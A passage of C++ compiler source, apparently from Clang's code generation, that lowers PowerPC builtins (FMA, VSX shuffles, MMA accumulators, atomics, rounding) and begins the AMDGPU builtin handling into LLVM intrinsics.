case PPC::BI__builtin_ppc_recipdivd:
case PPC::BI__builtin_ppc_rsqrtf:
case PPC::BI__builtin_ppc_rsqrtd: {
FastMathFlags FMF = Builder.getFastMathFlags();
Builder.getFastMathFlags().setFast();
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
if (BuiltinID == PPC::BI__builtin_ppc_recipdivf ||
BuiltinID == PPC::BI__builtin_ppc_recipdivd) {
Value *Y = EmitScalarExpr(E->getArg(1));
Value *FDiv = Builder.CreateFDiv(X, Y, "recipdiv");
Builder.getFastMathFlags() &= (FMF);
return FDiv;
}
auto *One = ConstantFP::get(ResultType, 1.0);
llvm::Function *F = CGM.getIntrinsic(Intrinsic::sqrt, ResultType);
Value *FDiv = Builder.CreateFDiv(One, Builder.CreateCall(F, X), "rsqrt");
Builder.getFastMathFlags() &= (FMF);
return FDiv;
}
case PPC::BI__builtin_ppc_alignx: {
ConstantInt *AlignmentCI = cast<ConstantInt>(Ops[0]);
if (AlignmentCI->getValue().ugt(llvm::Value::MaximumAlignment))
AlignmentCI = ConstantInt::get(AlignmentCI->getType(),
llvm::Value::MaximumAlignment);
emitAlignmentAssumption(Ops[1], E->getArg(1),
/*The expr loc is sufficient.*/ SourceLocation(),
AlignmentCI, nullptr);
return Ops[1];
}
case PPC::BI__builtin_ppc_rdlam: {
llvm::Type *Ty = Ops[0]->getType();
Value *ShiftAmt = Builder.CreateIntCast(Ops[1], Ty, false);
Function *F = CGM.getIntrinsic(Intrinsic::fshl, Ty);
Value *Rotate = Builder.CreateCall(F, {Ops[0], Ops[0], ShiftAmt});
return Builder.CreateAnd(Rotate, Ops[2]);
}
case PPC::BI__builtin_ppc_load2r: {
Function *F = CGM.getIntrinsic(Intrinsic::ppc_load2r);
Ops[0] = Builder.CreateBitCast(Ops[0], Int8PtrTy);
Value *LoadIntrinsic = Builder.CreateCall(F, Ops);
return Builder.CreateTrunc(LoadIntrinsic, Int16Ty);
}
// FMA variations
case PPC::BI__builtin_vsx_xvmaddadp:
case PPC::BI__builtin_vsx_xvmaddasp:
case PPC::BI__builtin_vsx_xvnmaddadp:
case PPC::BI__builtin_vsx_xvnmaddasp:
case PPC::BI__builtin_vsx_xvmsubadp:
case PPC::BI__builtin_vsx_xvmsubasp:
case PPC::BI__builtin_vsx_xvnmsubadp:
case PPC::BI__builtin_vsx_xvnmsubasp: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Y = EmitScalarExpr(E->getArg(1));
Value *Z = EmitScalarExpr(E->getArg(2));
llvm::Function *F;
if (Builder.getIsFPConstrained())
F = CGM.getIntrinsic(Intrinsic::experimental_constrained_fma, ResultType);
else
F = CGM.getIntrinsic(Intrinsic::fma, ResultType);
switch (BuiltinID) {
case PPC::BI__builtin_vsx_xvmaddadp:
case PPC::BI__builtin_vsx_xvmaddasp:
if (Builder.getIsFPConstrained())
return Builder.CreateConstrainedFPCall(F, {X, Y, Z});
else
return Builder.CreateCall(F, {X, Y, Z});
case PPC::BI__builtin_vsx_xvnmaddadp:
case PPC::BI__builtin_vsx_xvnmaddasp:
if (Builder.getIsFPConstrained())
return Builder.CreateFNeg(
Builder.CreateConstrainedFPCall(F, {X, Y, Z}), "neg");
else
return Builder.CreateFNeg(Builder.CreateCall(F, {X, Y, Z}), "neg");
case PPC::BI__builtin_vsx_xvmsubadp:
case PPC::BI__builtin_vsx_xvmsubasp:
if (Builder.getIsFPConstrained())
return Builder.CreateConstrainedFPCall(
F, {X, Y, Builder.CreateFNeg(Z, "neg")});
else
return Builder.CreateCall(F, {X, Y, Builder.CreateFNeg(Z, "neg")});
case PPC::BI__builtin_vsx_xvnmsubadp:
case PPC::BI__builtin_vsx_xvnmsubasp:
if (Builder.getIsFPConstrained())
return Builder.CreateFNeg(
Builder.CreateConstrainedFPCall(
F, {X, Y, Builder.CreateFNeg(Z, "neg")}),
"neg");
else
return Builder.CreateFNeg(
Builder.CreateCall(F, {X, Y, Builder.CreateFNeg(Z, "neg")}),
"neg");
}
llvm_unreachable("Unknown FMA operation");
return nullptr; // Suppress no-return warning
}
case PPC::BI__builtin_vsx_insertword: {
llvm::Function *F = CGM.getIntrinsic(Intrinsic::ppc_vsx_xxinsertw);
// Third argument is a compile time constant int. It must be clamped to
// to the range [0, 12].
ConstantInt *ArgCI = dyn_cast<ConstantInt>(Ops[2]);
assert(ArgCI &&
"Third arg to xxinsertw intrinsic must be constant integer");
const int64_t MaxIndex = 12;
int64_t Index = clamp(ArgCI->getSExtValue(), 0, MaxIndex);
// The builtin semantics don't exactly match the xxinsertw instructions
// semantics (which ppc_vsx_xxinsertw follows). The builtin extracts the
// word from the first argument, and inserts it in the second argument. The
// instruction extracts the word from its second input register and inserts
// it into its first input register, so swap the first and second arguments.
std::swap(Ops[0], Ops[1]);
// Need to cast the second argument from a vector of unsigned int to a
// vector of long long.
Ops[1] =
Builder.CreateBitCast(Ops[1], llvm::FixedVectorType::get(Int64Ty, 2));
if (getTarget().isLittleEndian()) {
// Reverse the double words in the vector we will extract from.
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int64Ty, 2));
Ops[0] = Builder.CreateShuffleVector(Ops[0], Ops[0], ArrayRef<int>{1, 0});
// Reverse the index.
Index = MaxIndex - Index;
}
// Intrinsic expects the first arg to be a vector of int.
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int32Ty, 4));
Ops[2] = ConstantInt::getSigned(Int32Ty, Index);
return Builder.CreateCall(F, Ops);
}
case PPC::BI__builtin_vsx_extractuword: {
llvm::Function *F = CGM.getIntrinsic(Intrinsic::ppc_vsx_xxextractuw);
// Intrinsic expects the first argument to be a vector of doublewords.
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int64Ty, 2));
// The second argument is a compile time constant int that needs to
// be clamped to the range [0, 12].
ConstantInt *ArgCI = dyn_cast<ConstantInt>(Ops[1]);
assert(ArgCI &&
"Second Arg to xxextractuw intrinsic must be a constant integer!");
const int64_t MaxIndex = 12;
int64_t Index = clamp(ArgCI->getSExtValue(), 0, MaxIndex);
if (getTarget().isLittleEndian()) {
// Reverse the index.
Index = MaxIndex - Index;
Ops[1] = ConstantInt::getSigned(Int32Ty, Index);
// Emit the call, then reverse the double words of the results vector.
Value *Call = Builder.CreateCall(F, Ops);
Value *ShuffleCall =
Builder.CreateShuffleVector(Call, Call, ArrayRef<int>{1, 0});
return ShuffleCall;
} else {
Ops[1] = ConstantInt::getSigned(Int32Ty, Index);
return Builder.CreateCall(F, Ops);
}
}
case PPC::BI__builtin_vsx_xxpermdi: {
ConstantInt *ArgCI = dyn_cast<ConstantInt>(Ops[2]);
assert(ArgCI && "Third arg must be constant integer!");
unsigned Index = ArgCI->getZExtValue();
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int64Ty, 2));
Ops[1] =
Builder.CreateBitCast(Ops[1], llvm::FixedVectorType::get(Int64Ty, 2));
// Account for endianness by treating this as just a shuffle. So we use the
// same indices for both LE and BE in order to produce expected results in
// both cases.
int ElemIdx0 = (Index & 2) >> 1;
int ElemIdx1 = 2 + (Index & 1);
int ShuffleElts[2] = {ElemIdx0, ElemIdx1};
Value *ShuffleCall =
Builder.CreateShuffleVector(Ops[0], Ops[1], ShuffleElts);
QualType BIRetType = E->getType();
auto RetTy = ConvertType(BIRetType);
return Builder.CreateBitCast(ShuffleCall, RetTy);
}
case PPC::BI__builtin_vsx_xxsldwi: {
ConstantInt *ArgCI = dyn_cast<ConstantInt>(Ops[2]);
assert(ArgCI && "Third argument must be a compile time constant");
unsigned Index = ArgCI->getZExtValue() & 0x3;
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int32Ty, 4));
Ops[1] =
Builder.CreateBitCast(Ops[1], llvm::FixedVectorType::get(Int32Ty, 4));
// Create a shuffle mask
int ElemIdx0;
int ElemIdx1;
int ElemIdx2;
int ElemIdx3;
if (getTarget().isLittleEndian()) {
// Little endian element N comes from element 8+N-Index of the
// concatenated wide vector (of course, using modulo arithmetic on
// the total number of elements).
ElemIdx0 = (8 - Index) % 8;
ElemIdx1 = (9 - Index) % 8;
ElemIdx2 = (10 - Index) % 8;
ElemIdx3 = (11 - Index) % 8;
} else {
// Big endian ElemIdx<N> = Index + N
ElemIdx0 = Index;
ElemIdx1 = Index + 1;
ElemIdx2 = Index + 2;
ElemIdx3 = Index + 3;
}
int ShuffleElts[4] = {ElemIdx0, ElemIdx1, ElemIdx2, ElemIdx3};
Value *ShuffleCall =
Builder.CreateShuffleVector(Ops[0], Ops[1], ShuffleElts);
QualType BIRetType = E->getType();
auto RetTy = ConvertType(BIRetType);
return Builder.CreateBitCast(ShuffleCall, RetTy);
}
case PPC::BI__builtin_pack_vector_int128: {
bool isLittleEndian = getTarget().isLittleEndian();
Value *UndefValue =
llvm::UndefValue::get(llvm::FixedVectorType::get(Ops[0]->getType(), 2));
Value *Res = Builder.CreateInsertElement(
UndefValue, Ops[0], (uint64_t)(isLittleEndian ? 1 : 0));
Res = Builder.CreateInsertElement(Res, Ops[1],
(uint64_t)(isLittleEndian ? 0 : 1));
return Builder.CreateBitCast(Res, ConvertType(E->getType()));
}
case PPC::BI__builtin_unpack_vector_int128: {
ConstantInt *Index = cast<ConstantInt>(Ops[1]);
Value *Unpacked = Builder.CreateBitCast(
Ops[0], llvm::FixedVectorType::get(ConvertType(E->getType()), 2));
if (getTarget().isLittleEndian())
Index = ConstantInt::get(Index->getType(), 1 - Index->getZExtValue());
return Builder.CreateExtractElement(Unpacked, Index);
}
case PPC::BI__builtin_ppc_sthcx: {
llvm::Function *F = CGM.getIntrinsic(Intrinsic::ppc_sthcx);
Ops[0] = Builder.CreateBitCast(Ops[0], Int8PtrTy);
Ops[1] = Builder.CreateSExt(Ops[1], Int32Ty);
return Builder.CreateCall(F, Ops);
}
// The PPC MMA builtins take a pointer to a __vector_quad as an argument.
// Some of the MMA instructions accumulate their result into an existing
// accumulator whereas the others generate a new accumulator. So we need to
// use custom code generation to expand a builtin call with a pointer to a
// load (if the corresponding instruction accumulates its result) followed by
// the call to the intrinsic and a store of the result.
#define CUSTOM_BUILTIN(Name, Intr, Types, Accumulate) \
case PPC::BI__builtin_##Name:
#include "clang/Basic/BuiltinsPPC.def"
{
// The first argument of these two builtins is a pointer used to store their
// result. However, the llvm intrinsics return their result in multiple
// return values. So, here we emit code extracting these values from the
// intrinsic results and storing them using that pointer.
if (BuiltinID == PPC::BI__builtin_mma_disassemble_acc ||
BuiltinID == PPC::BI__builtin_vsx_disassemble_pair ||
BuiltinID == PPC::BI__builtin_mma_disassemble_pair) {
unsigned NumVecs = 2;
auto Intrinsic = Intrinsic::ppc_vsx_disassemble_pair;
if (BuiltinID == PPC::BI__builtin_mma_disassemble_acc) {
NumVecs = 4;
Intrinsic = Intrinsic::ppc_mma_disassemble_acc;
}
llvm::Function *F = CGM.getIntrinsic(Intrinsic);
Address Addr = EmitPointerWithAlignment(E->getArg(1));
Value *Vec = Builder.CreateLoad(Addr);
Value *Call = Builder.CreateCall(F, {Vec});
llvm::Type *VTy = llvm::FixedVectorType::get(Int8Ty, 16);
Value *Ptr = Builder.CreateBitCast(Ops[0], VTy->getPointerTo());
for (unsigned i=0; i<NumVecs; i++) {
Value *Vec = Builder.CreateExtractValue(Call, i);
llvm::ConstantInt* Index = llvm::ConstantInt::get(IntTy, i);
Value *GEP = Builder.CreateInBoundsGEP(VTy, Ptr, Index);
Builder.CreateAlignedStore(Vec, GEP, MaybeAlign(16));
}
return Call;
}
if (BuiltinID == PPC::BI__builtin_vsx_build_pair ||
BuiltinID == PPC::BI__builtin_mma_build_acc) {
// Reverse the order of the operands for LE, so the
// same builtin call can be used on both LE and BE
// without the need for the programmer to swap operands.
// The operands are reversed starting from the second argument,
// the first operand is the pointer to the pair/accumulator
// that is being built.
if (getTarget().isLittleEndian())
std::reverse(Ops.begin() + 1, Ops.end());
}
bool Accumulate;
switch (BuiltinID) {
#define CUSTOM_BUILTIN(Name, Intr, Types, Acc) \
case PPC::BI__builtin_##Name: \
ID = Intrinsic::ppc_##Intr; \
Accumulate = Acc; \
break;
#include "clang/Basic/BuiltinsPPC.def"
}
if (BuiltinID == PPC::BI__builtin_vsx_lxvp ||
BuiltinID == PPC::BI__builtin_vsx_stxvp ||
BuiltinID == PPC::BI__builtin_mma_lxvp ||
BuiltinID == PPC::BI__builtin_mma_stxvp) {
if (BuiltinID == PPC::BI__builtin_vsx_lxvp ||
BuiltinID == PPC::BI__builtin_mma_lxvp) {
Ops[1] = Builder.CreateBitCast(Ops[1], Int8PtrTy);
Ops[0] = Builder.CreateGEP(Int8Ty, Ops[1], Ops[0]);
} else {
Ops[2] = Builder.CreateBitCast(Ops[2], Int8PtrTy);
Ops[1] = Builder.CreateGEP(Int8Ty, Ops[2], Ops[1]);
}
Ops.pop_back();
llvm::Function *F = CGM.getIntrinsic(ID);
return Builder.CreateCall(F, Ops, "");
}
SmallVector<Value*, 4> CallOps;
if (Accumulate) {
Address Addr = EmitPointerWithAlignment(E->getArg(0));
Value *Acc = Builder.CreateLoad(Addr);
CallOps.push_back(Acc);
}
for (unsigned i=1; i<Ops.size(); i++)
CallOps.push_back(Ops[i]);
llvm::Function *F = CGM.getIntrinsic(ID);
Value *Call = Builder.CreateCall(F, CallOps);
return Builder.CreateAlignedStore(Call, Ops[0], MaybeAlign(64));
}
case PPC::BI__builtin_ppc_compare_and_swap:
case PPC::BI__builtin_ppc_compare_and_swaplp: {
Address Addr = EmitPointerWithAlignment(E->getArg(0));
Address OldValAddr = EmitPointerWithAlignment(E->getArg(1));
Value *OldVal = Builder.CreateLoad(OldValAddr);
QualType AtomicTy = E->getArg(0)->getType()->getPointeeType();
LValue LV = MakeAddrLValue(Addr, AtomicTy);
auto Pair = EmitAtomicCompareExchange(
LV, RValue::get(OldVal), RValue::get(Ops[2]), E->getExprLoc(),
llvm::AtomicOrdering::Monotonic, llvm::AtomicOrdering::Monotonic, true);
// Unlike c11's atomic_compare_exchange, accroding to
// https://www.ibm.com/docs/en/xl-c-and-cpp-aix/16.1?topic=functions-compare-swap-compare-swaplp
// > In either case, the contents of the memory location specified by addr
// > are copied into the memory location specified by old_val_addr.
// But it hasn't specified storing to OldValAddr is atomic or not and
// which order to use. Now following XL's codegen, treat it as a normal
// store.
Value *LoadedVal = Pair.first.getScalarVal();
Builder.CreateStore(LoadedVal, OldValAddr);
return Builder.CreateZExt(Pair.second, Builder.getInt32Ty());
}
case PPC::BI__builtin_ppc_fetch_and_add:
case PPC::BI__builtin_ppc_fetch_and_addlp: {
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Add, E,
llvm::AtomicOrdering::Monotonic);
}
case PPC::BI__builtin_ppc_fetch_and_and:
case PPC::BI__builtin_ppc_fetch_and_andlp: {
return MakeBinaryAtomicValue(*this, AtomicRMWInst::And, E,
llvm::AtomicOrdering::Monotonic);
}
case PPC::BI__builtin_ppc_fetch_and_or:
case PPC::BI__builtin_ppc_fetch_and_orlp: {
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Or, E,
llvm::AtomicOrdering::Monotonic);
}
case PPC::BI__builtin_ppc_fetch_and_swap:
case PPC::BI__builtin_ppc_fetch_and_swaplp: {
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Xchg, E,
llvm::AtomicOrdering::Monotonic);
}
case PPC::BI__builtin_ppc_ldarx:
case PPC::BI__builtin_ppc_lwarx:
case PPC::BI__builtin_ppc_lharx:
case PPC::BI__builtin_ppc_lbarx:
return emitPPCLoadReserveIntrinsic(*this, BuiltinID, E);
case PPC::BI__builtin_ppc_mfspr: {
llvm::Type *RetType = CGM.getDataLayout().getTypeSizeInBits(VoidPtrTy) == 32
? Int32Ty
: Int64Ty;
Function *F = CGM.getIntrinsic(Intrinsic::ppc_mfspr, RetType);
return Builder.CreateCall(F, Ops);
}
case PPC::BI__builtin_ppc_mtspr: {
llvm::Type *RetType = CGM.getDataLayout().getTypeSizeInBits(VoidPtrTy) == 32
? Int32Ty
: Int64Ty;
Function *F = CGM.getIntrinsic(Intrinsic::ppc_mtspr, RetType);
return Builder.CreateCall(F, Ops);
}
case PPC::BI__builtin_ppc_popcntb: {
Value *ArgValue = EmitScalarExpr(E->getArg(0));
llvm::Type *ArgType = ArgValue->getType();
Function *F = CGM.getIntrinsic(Intrinsic::ppc_popcntb, {ArgType, ArgType});
return Builder.CreateCall(F, Ops, "popcntb");
}
case PPC::BI__builtin_ppc_mtfsf: {
// The builtin takes a uint32 that needs to be cast to an
// f64 to be passed to the intrinsic.
Value *Cast = Builder.CreateUIToFP(Ops[1], DoubleTy);
llvm::Function *F = CGM.getIntrinsic(Intrinsic::ppc_mtfsf);
return Builder.CreateCall(F, {Ops[0], Cast}, "");
}
case PPC::BI__builtin_ppc_swdiv_nochk:
case PPC::BI__builtin_ppc_swdivs_nochk: {
FastMathFlags FMF = Builder.getFastMathFlags();
Builder.getFastMathFlags().setFast();
Value *FDiv = Builder.CreateFDiv(Ops[0], Ops[1], "swdiv_nochk");
Builder.getFastMathFlags() &= (FMF);
return FDiv;
}
case PPC::BI__builtin_ppc_fric:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(
*this, E, Intrinsic::rint,
Intrinsic::experimental_constrained_rint))
.getScalarVal();
case PPC::BI__builtin_ppc_frim:
case PPC::BI__builtin_ppc_frims:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(
*this, E, Intrinsic::floor,
Intrinsic::experimental_constrained_floor))
.getScalarVal();
case PPC::BI__builtin_ppc_frin:
case PPC::BI__builtin_ppc_frins:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(
*this, E, Intrinsic::round,
Intrinsic::experimental_constrained_round))
.getScalarVal();
case PPC::BI__builtin_ppc_frip:
case PPC::BI__builtin_ppc_frips:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(
*this, E, Intrinsic::ceil,
Intrinsic::experimental_constrained_ceil))
.getScalarVal();
case PPC::BI__builtin_ppc_friz:
case PPC::BI__builtin_ppc_frizs:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(
*this, E, Intrinsic::trunc,
Intrinsic::experimental_constrained_trunc))
.getScalarVal();
case PPC::BI__builtin_ppc_fsqrt:
case PPC::BI__builtin_ppc_fsqrts:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(
*this, E, Intrinsic::sqrt,
Intrinsic::experimental_constrained_sqrt))
.getScalarVal();
case PPC::BI__builtin_ppc_test_data_class: {
llvm::Type *ArgType = EmitScalarExpr(E->getArg(0))->getType();
unsigned IntrinsicID;
if (ArgType->isDoubleTy())
IntrinsicID = Intrinsic::ppc_test_data_class_d;
else if (ArgType->isFloatTy())
IntrinsicID = Intrinsic::ppc_test_data_class_f;
else
llvm_unreachable("Invalid Argument Type");
return Builder.CreateCall(CGM.getIntrinsic(IntrinsicID), Ops,
"test_data_class");
}
case PPC::BI__builtin_ppc_swdiv:
case PPC::BI__builtin_ppc_swdivs:
return Builder.CreateFDiv(Ops[0], Ops[1], "swdiv");
}
}
namespace {
// If \p E is not null pointer, insert address space cast to match return
// type of \p E if necessary.
Value *EmitAMDGPUDispatchPtr(CodeGenFunction &CGF,
const CallExpr *E = nullptr) {
auto *F = CGF.CGM.getIntrinsic(Intrinsic::amdgcn_dispatch_ptr);
auto *Call = CGF.Builder.CreateCall(F);
Call->addRetAttr(
Attribute::getWithDereferenceableBytes(Call->getContext(), 64));
Call->addRetAttr(Attribute::getWithAlignment(Call->getContext(), Align(4)));
if (!E)
return Call;
QualType BuiltinRetType = E->getType();
auto *RetTy = cast<llvm::PointerType>(CGF.ConvertType(BuiltinRetType));
if (RetTy == Call->getType())
return Call;
return CGF.Builder.CreateAddrSpaceCast(Call, RetTy);
}
// \p Index is 0, 1, and 2 for x, y, and z dimension, respectively.
Value *EmitAMDGPUWorkGroupSize(CodeGenFunction &CGF, unsigned Index) {
const unsigned XOffset = 4;
auto *DP = EmitAMDGPUDispatchPtr(CGF);
// Indexing the HSA kernel_dispatch_packet struct.
auto *Offset = llvm::ConstantInt::get(CGF.Int32Ty, XOffset + Index * 2);
auto *GEP = CGF.Builder.CreateGEP(CGF.Int8Ty, DP, Offset);
auto *DstTy =
CGF.Int16Ty->getPointerTo(GEP->getType()->getPointerAddressSpace());
auto *Cast = CGF.Builder.CreateBitCast(GEP, DstTy);
auto *LD = CGF.Builder.CreateLoad(Address(Cast, CharUnits::fromQuantity(2)));
llvm::MDBuilder MDHelper(CGF.getLLVMContext());
llvm::MDNode *RNode = MDHelper.createRange(APInt(16, 1),
APInt(16, CGF.getTarget().getMaxOpenCLWorkGroupSize() + 1));
LD->setMetadata(llvm::LLVMContext::MD_range, RNode);
LD->setMetadata(llvm::LLVMContext::MD_invariant_load,
llvm::MDNode::get(CGF.getLLVMContext(), None));
return LD;
}
// \p Index is 0, 1, and 2 for x, y, and z dimension, respectively.
Value *EmitAMDGPUGridSize(CodeGenFunction &CGF, unsigned Index) {
const unsigned XOffset = 12;
auto *DP = EmitAMDGPUDispatchPtr(CGF);
// Indexing the HSA kernel_dispatch_packet struct.
auto *Offset = llvm::ConstantInt::get(CGF.Int32Ty, XOffset + Index * 4);
auto *GEP = CGF.Builder.CreateGEP(CGF.Int8Ty, DP, Offset);
auto *DstTy =
CGF.Int32Ty->getPointerTo(GEP->getType()->getPointerAddressSpace());
auto *Cast = CGF.Builder.CreateBitCast(GEP, DstTy);
auto *LD = CGF.Builder.CreateLoad(Address(Cast, CharUnits::fromQuantity(4)));
LD->setMetadata(llvm::LLVMContext::MD_invariant_load,
llvm::MDNode::get(CGF.getLLVMContext(), None));
return LD;
}
} // namespace
// For processing memory ordering and memory scope arguments of various
// amdgcn builtins.
// \p Order takes a C++11 comptabile memory-ordering specifier and converts
// it into LLVM's memory ordering specifier using atomic C ABI, and writes
// to \p AO. \p Scope takes a const char * and converts it into AMDGCN
// specific SyncScopeID and writes it to \p SSID.
bool CodeGenFunction::ProcessOrderScopeAMDGCN(Value *Order, Value *Scope,
llvm::AtomicOrdering &AO,
llvm::SyncScope::ID &SSID) {
if (isa<llvm::ConstantInt>(Order)) {
int ord = cast<llvm::ConstantInt>(Order)->getZExtValue();
// Map C11/C++11 memory ordering to LLVM memory ordering
assert(llvm::isValidAtomicOrderingCABI(ord));
switch (static_cast<llvm::AtomicOrderingCABI>(ord)) {
case llvm::AtomicOrderingCABI::acquire:
case llvm::AtomicOrderingCABI::consume:
AO = llvm::AtomicOrdering::Acquire;
break;
case llvm::AtomicOrderingCABI::release:
AO = llvm::AtomicOrdering::Release;
break;
case llvm::AtomicOrderingCABI::acq_rel:
AO = llvm::AtomicOrdering::AcquireRelease;
break;
case llvm::AtomicOrderingCABI::seq_cst:
AO = llvm::AtomicOrdering::SequentiallyConsistent;
break;
case llvm::AtomicOrderingCABI::relaxed:
AO = llvm::AtomicOrdering::Monotonic;
break;
}
StringRef scp;
llvm::getConstantStringInfo(Scope, scp);
SSID = getLLVMContext().getOrInsertSyncScopeID(scp);
return true;
}
return false;
}
Value *CodeGenFunction::EmitAMDGPUBuiltinExpr(unsigned BuiltinID,
const CallExpr *E) {
llvm::AtomicOrdering AO = llvm::AtomicOrdering::SequentiallyConsistent;
llvm::SyncScope::ID SSID;
switch (BuiltinID) {
case AMDGPU::BI__builtin_amdgcn_div_scale:
case AMDGPU::BI__builtin_amdgcn_div_scalef: {
// Translate from the intrinsics's struct return to the builtin's out
// argument.
Address FlagOutPtr = EmitPointerWithAlignment(E->getArg(3));
llvm::Value *X = EmitScalarExpr(E->getArg(0));
llvm::Value *Y = EmitScalarExpr(E->getArg(1));
llvm::Value *Z = EmitScalarExpr(E->getArg(2));
llvm::Function *Callee = CGM.getIntrinsic(Intrinsic::amdgcn_div_scale,
X->getType());
llvm::Value *Tmp = Builder.CreateCall(Callee, {X, Y, Z});
llvm::Value *Result = Builder.CreateExtractValue(Tmp, 0);
llvm::Value *Flag = Builder.CreateExtractValue(Tmp, 1);
llvm::Type *RealFlagType
= FlagOutPtr.getPointer()->getType()->getPointerElementType();
llvm::Value *FlagExt = Builder.CreateZExt(Flag, RealFlagType);
Builder.CreateStore(FlagExt, FlagOutPtr);
return Result;
}
case AMDGPU::BI__builtin_amdgcn_div_fmas:
case AMDGPU::BI__builtin_amdgcn_div_fmasf: {
llvm::Value *Src0 = EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = EmitScalarExpr(E->getArg(1));
llvm::Value *Src2 = EmitScalarExpr(E->getArg(2));
llvm::Value *Src3 = EmitScalarExpr(E->getArg(3));
llvm::Function *F = CGM.getIntrinsic(Intrinsic::amdgcn_div_fmas,
Src0->getType());
llvm::Value *Src3ToBool = Builder.CreateIsNotNull(Src3);
return Builder.CreateCall(F, {Src0, Src1, Src2, Src3ToBool});
}
case AMDGPU::BI__builtin_amdgcn_ds_swizzle:
return emitBinaryBuiltin(*this, E, Intrinsic::amdgcn_ds_swizzle);
case AMDGPU::BI__builtin_amdgcn_mov_dpp8:
return emitBinaryBuiltin(*this, E, Intrinsic::amdgcn_mov_dpp8);
case AMDGPU::BI__builtin_amdgcn_mov_dpp:
case AMDGPU::BI__builtin_amdgcn_update_dpp: {
llvm::SmallVector<llvm::Value *, 6> Args;
for (unsigned I = 0; I != E->getNumArgs(); ++I)
Args.push_back(EmitScalarExpr(E->getArg(I)));
assert(Args.size() == 5 || Args.size() == 6);
if (Args.size() == 5)
Args.insert(Args.begin(), llvm::UndefValue::get(Args[0]->getType()));
Function *F =
CGM.getIntrinsic(Intrinsic::amdgcn_update_dpp, Args[0]->getType());
return Builder.CreateCall(F, Args);
}
case AMDGPU::BI__builtin_amdgcn_div_fixup:
case AMDGPU::BI__builtin_amdgcn_div_fixupf:
case AMDGPU::BI__builtin_amdgcn_div_fixuph:
return emitTernaryBuiltin(*this, E, Intrinsic::amdgcn_div_fixup);
case AMDGPU::BI__builtin_amdgcn_trig_preop:
case AMDGPU::BI__builtin_amdgcn_trig_preopf:
return emitFPIntBuiltin(*this, E, Intrinsic::amdgcn_trig_preop);
case AMDGPU::BI__builtin_amdgcn_rcp:
case AMDGPU::BI__builtin_amdgcn_rcpf:
case AMDGPU::BI__builtin_amdgcn_rcph:
return emitUnaryBuiltin(*this, E, Intrinsic::amdgcn_rcp);
case AMDGPU::BI__builtin_amdgcn_sqrt:
case AMDGPU::BI__builtin_amdgcn_sqrtf:
case AMDGPU::BI__builtin_amdgcn_sqrth:
return emitUnaryBuiltin(*this, E, Intrinsic::amdgcn_sqrt);
case AMDGPU::BI__builtin_amdgcn_rsq:
case AMDGPU::BI__builtin_amdgcn_rsqf:
case AMDGPU::BI__builtin_amdgcn_rsqh:
return emitUnaryBuiltin(*this, E, Intrinsic::amdgcn_rsq);
case AMDGPU::BI__builtin_amdgcn_rsq_clamp:
case AMDGPU::BI__builtin_amdgcn_rsq_clampf:
return emitUnaryBuiltin(*this, E, Intrinsic::amdgcn_rsq_clamp);
case AMDGPU::BI__builtin_amdgcn_sinf:
case AMDGPU::BI__builtin_amdgcn_sinh:
return emitUnaryBuiltin(*this, E, Intrinsic::amdgcn_sin);
case AMDGPU::BI__builtin_amdgcn_cosf:
case AMDGPU::BI__builtin_amdgcn_cosh:
return emitUnaryBuiltin(*this, E, Intrinsic::amdgcn_cos);
case AMDGPU::BI__builtin_amdgcn_dispatch_ptr:
return EmitAMDGPUDispatchPtr(*this, E);
case AMDGPU::BI__builtin_amdgcn_log_clampf:
return emitUnaryBuiltin(*this, E, Intrinsic::amdgcn_log_clamp);
case AMDGPU::BI__builtin_amdgcn_ldexp:
case AMDGPU::BI__builtin_amdgcn_ldexpf:
case AMDGPU::BI__builtin_amdgcn_ldexph:
return emitFPIntBuiltin(*this, E, Intrinsic::amdgcn_ldexp);
case AMDGPU::BI__builtin_amdgcn_frexp_mant:
case AMDGPU::BI__builtin_amdgcn_frexp_mantf:
case AMDGPU::BI__builtin_amdgcn_frexp_manth:
return emitUnaryBuiltin(*this, E, Intrinsic::amdgcn_frexp_mant);
case AMDGPU::BI__builtin_amdgcn_frexp_exp:
case AMDGPU::BI__builtin_amdgcn_frexp_expf: {
Value *Src0 = EmitScalarExpr(E->getArg(0));
Function *F = CGM.getIntrinsic(Intrinsic::amdgcn_frexp_exp,
{ Builder.getInt32Ty(), Src0->getType() });
return Builder.CreateCall(F, Src0);
}
case AMDGPU::BI__builtin_amdgcn_frexp_exph: {
Value *Src0 = EmitScalarExpr(E->getArg(0));
Function *F = CGM.getIntrinsic(Intrinsic::amdgcn_frexp_exp,
{ Builder.getInt16Ty(), Src0->getType() });
return Builder.CreateCall(F, Src0);
}
case AMDGPU::BI__builtin_amdgcn_fract:
case AMDGPU::BI__builtin_amdgcn_fractf:
case AMDGPU::BI__builtin_amdgcn_fracth:
return emitUnaryBuiltin(*this, E, Intrinsic::amdgcn_fract);
case AMDGPU::BI__builtin_amdgcn_lerp:
return emitTernaryBuiltin(*this, E, Intrinsic::amdgcn_lerp);
case AMDGPU::BI__builtin_amdgcn_ubfe:
return emitTernaryBuiltin(*this, E, Intrinsic::amdgcn_ubfe);
case AMDGPU::BI__builtin_amdgcn_sbfe:
return emitTernaryBuiltin(*this, E, Intrinsic::amdgcn_sbfe);
case AMDGPU::BI__builtin_amdgcn_uicmp:
case AMDGPU::BI__builtin_amdgcn_uicmpl:
case AMDGPU::BI__builtin_amdgcn_sicmp:
case AMDGPU::BI__builtin_amdgcn_sicmpl: {
llvm::Value *Src0 = EmitScalarExpr(E->getArg(0));
